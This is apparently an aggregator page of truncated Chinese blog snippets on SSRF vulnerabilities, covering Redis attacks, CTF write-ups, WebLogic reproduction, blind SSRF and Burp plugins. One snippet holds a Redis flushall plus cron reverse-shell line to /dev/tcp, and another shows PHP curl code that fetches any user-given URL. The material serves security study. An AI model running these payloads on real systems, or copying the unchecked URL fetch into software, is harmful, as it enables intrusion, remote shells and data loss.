ICode9

精准搜索请尝试: 精确搜索
  • 浅谈SSRF2020-05-27 16:03:49

    前言 最近主要是在思考考研的事。还是没想好-- 这几天的话写了一篇简单代审投稿了星盟,看了会SSRF。今天简单写下SSRF。 本文所有思路均来自互联网,并没有新想法。仅仅只是做个记录。 本文可能会有大量重复文字,我会在文中文末明显处都会表明出处,侵权一定删除。 SSRF简介 SSRF(Server

  • burp插件大全 漏洞扫描 waf绕过 sql XSS 命令注入 fuzzer2020-05-21 23:06:00

    burp插件目录:   Scanners-扫描类 Custom Features-自定义功能类 Beautifiers and Decoders-美化和解码相关 Cloud Security-云安全,主要是AWS这类真云 Scripting-脚本相关 OAuth and SSO-开放授权(OAuth)和单点登录(SSO)相关安全检测插件 Information Gathering-信息收集 Vulne

  • Redis利用,攻击内网(ssrf)2020-05-11 22:56:18

    Redis语法 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)

  • [网鼎杯 2018]Fakebook SQL报错注入+SSRF+反序列化2020-05-07 14:58:09

    知识点   SSRF(插眼)   SQL报错注入(插眼)   反序列化  https://www.cnblogs.com/Lee-404/p/12771032.html 解题   首先访问robots.txt,发现有个user.php.bak,下载 <?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public functio

  • Weblogic-SSRF 漏洞复现2020-03-19 21:02:02

    0x01 环境搭建     我这里使用的是vulhub,它几乎包含了所有的漏洞环境。(建议安装在ubuntu上)   有需要的小伙伴来企鹅群自取。   安装好vulhub之后需要cd 到weblogic ssrf 目录下   然后启动测试环境   docker-compose build   docker-compose up -d   此次环境搭建在

  • [web安全原理分析]-SSRF漏洞入门2020-02-19 17:00:55

    SSRF漏洞 SSRF漏洞 SSRF意为服务端请求伪造(Server-Side Request Forge)。攻击者利用SSRF漏洞通过服务器发起伪造请求,就这样可以访问内网的数据,进行内网信息探测或者内网漏洞利用 SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能,但对服务器的地址没有做严格的

  • SSRF漏洞2020-02-05 21:03:05

    SSRF SSRF(Server-Side Request forgery,服务器端请求伪造)是一种攻击者构造请求,由服务器端发起请求的web安全漏洞,很多时候的SSRF攻击的目标是外网无法访问的内部主机系统,因为由服务器发起的请求很多时候是外网无法访问的内部系统。可以算是内部信息泄露。 SSRF漏洞原理:SSRF的形

  • hackone ssrf2019-12-05 10:00:11

    alyssa_herrera submitted a report to U.S. Dept Of Defense. Jan 29th (2 years ago) Summary:A server side request forgery vulnerability appears to leak an internal IP address and tries to connect to an attacker controlled host.Description:In an normal

  • SSRF中的绕过姿势2019-10-26 19:05:27

    原文链接:https://mp.weixin.qq.com/s/467pD6VIpiYXfw2QTSzB4A

  • [WEB安全]SSRF之盲打SSRF2019-10-14 19:07:06

    无回显情况下通过VPS NC监听所有URL Schema存在情况,也可以用DNSlog来试探。 0x01 测试URL 当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL Schema: file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统中获取文件: http://exa

  • 渗透之路基础 -- 服务端请求伪造SSRF2019-09-17 09:56:21

    简介:SSRF 服务器端请求伪造,有的大型网站在web应用上提供了从其他服务器获取数据的功能。使用户指定的URL web应用获取图片,下载文件,读取文件内容。通常用于控制web进而探测内网服务以及攻击内网脆弱应用 即当作跳板机,可作为ssrfsocks代理 漏洞危害 内外网的端口和服务扫描 主机本

  • weblogic的ssrf漏洞2019-08-18 15:51:06

    前言    什么是ssrf SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 举一个例子: 比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于

  • 简单的SSRF的学习2019-07-24 19:50:27

    自己眼中的SSRF 成因 服务端允许了 可以向其他服务器请求获取一些数据 通过各种协议 http https file等(外网服务器所在的内网进行端口的扫描指纹的识别等) 一SSRF配合redis未授权访问 redis-cli -h $1 flushallecho -e "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.1.3/2333 0>&1

  • ssrf爆破mysql2019-07-13 17:53:36

    php ssrf 代码<?php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_HEADER, 0);#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);$data =curl_

  • ssrf(Server-Side Request Forgery)2019-06-30 13:01:47

    SSRF(Server-Side Request Forgery)(服务请求伪造): 是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ssrf的危害 可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息

  • SSRF总结2019-06-22 08:51:57

    ssrf漏洞,全称为服务端请求伪造漏洞,由于有的web应用需要实现从其它服务器上获取资源的功能,但是没有对url进行限制,导致可以构造非本意的url对内网或者其它服务器发起恶意请求。ssrf漏洞的危害可以通过ssrf漏洞可以对内网或本地机器进行主机发现,服务版本探测或者针对内网或本地一些薄

  • 0531 10-3 ssrf漏洞原理和实验案例演示2019-05-31 21:51:50

    http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php 改为 http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?url=baidu.com 得到 http://127.0.0.1/pikachu/vul/ssrf/ssrf_fgc.php?file= http://127.0.0.1/pik

  • PDFReacter:从SSRF到RCE2019-04-30 18:51:38

    什么是PDFReacter?-它是一种解析软件,可以把HTML文件转换为PDF文件。 在某次渗透测试时,我发现目标应用使用了PDFReacter进行文件转换。 于是我想到,也许这个软件在处理某些危险的HTML代码时存在缺陷。我尝试往一个正常的HTML页面插入一个单独的<img>标签,然后将其转换PDF,响应如下

  • 学习分享Download2019-04-11 17:50:39

    [七月Python基础入门+进阶熟练班+ 数据分析班+爬虫项目] [七月Python基础入门+进阶熟练班+ 数据分析班+爬虫项目] [七月Python基础入门+进阶熟练班+ 数据分析班+爬虫项目] [七月Python基础入门+进阶熟练班+ 数据分析班+爬虫项目] 需要学习资源,请点击开挂教学楼 需要学习资源,请

  • SSRF绕过filter_var(),preg_match()和parse_url()2019-04-02 15:42:54

    1.利用curl的变量解释符$ php版本 利用代码 /*ssrf.php*/<?php echo "Argument: ".$argv[1]."n"; // check if argument is a valid URL if(filter_var($argv[1], FILTER_VALIDATE_URL)) { // parse URL $r = parse_url($argv[1]); print_r($

  • Zimbra xxe+ssrf导致getshell2019-03-26 20:52:46

    Zimbra xxe+ssrf to RCE 前言 2019年3月13号,国外一名安全研究员在他的博客上公布了zimbra的这起漏洞,但是其中并未提到一些漏洞的利用细节,在此我将整个漏洞的利用过程进行复现。 原文链接:https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html#href1_ret

  • SSRF2019-03-12 17:41:33

    SSRF 关于SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造),攻击者通过伪造服务器端发起的请求,获取客户端所不能得到的数据。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 漏洞挖掘 从WEB功能上寻找 分享:通过URL地址分享内容 转码:通过URL地址把原地址的网页内

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有